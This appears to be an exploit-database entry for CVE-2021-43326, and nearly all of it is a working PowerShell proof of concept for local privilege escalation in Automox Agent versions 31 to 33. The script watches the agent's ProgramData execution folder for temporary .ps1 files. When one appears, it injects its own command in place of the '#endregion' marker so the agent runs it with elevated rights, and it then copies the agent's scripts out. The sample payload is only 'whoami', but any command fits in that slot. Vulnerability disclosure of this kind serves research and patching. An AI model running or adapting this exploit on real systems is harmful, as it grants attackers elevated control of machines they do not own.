Automox Agent 32 Local Privilege Escalation

`# Exploit Title: Automox Agent 32 - Local Privilege Escalation  
# Date: 13/12/2021  
# Exploit Author: Greg Foss  
# Writeup: https://www.lacework.com/blog/cve-2021-43326/  
# Vendor Homepage: https://www.automox.com/  
# Software Link: https://support.automox.com/help/agents  
# Version: 31, 32, 33  
# Tested on: Windows 10  
# Language: PowerShell  
# CVE: CVE-2021-43326  
  
New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\  
$payload = "whoami >> $HOME\Desktop\automox\who.txt"  
echo ""  
echo "Watching for Automox agent interaction..."  
echo ""  
for (($i = 0); $i -lt 500; $i++) {  
if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) {  
try {  
$dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name  
$dir = $dir.name  
$file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name  
$file = $file.name  
(Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file  
cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\  
echo 'popped :-)'  
Start-Sleep 5  
echo ''  
echo 'cloning all powershell script content...'  
for (($i = 0); $i -lt 100; $i++) {  
cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force  
Start-Sleep 1  
}  
exit  
} catch {  
throw $_.Exception.Message  
}  
} else {  
echo $i  
Start-Sleep 1  
}  
}  
  
`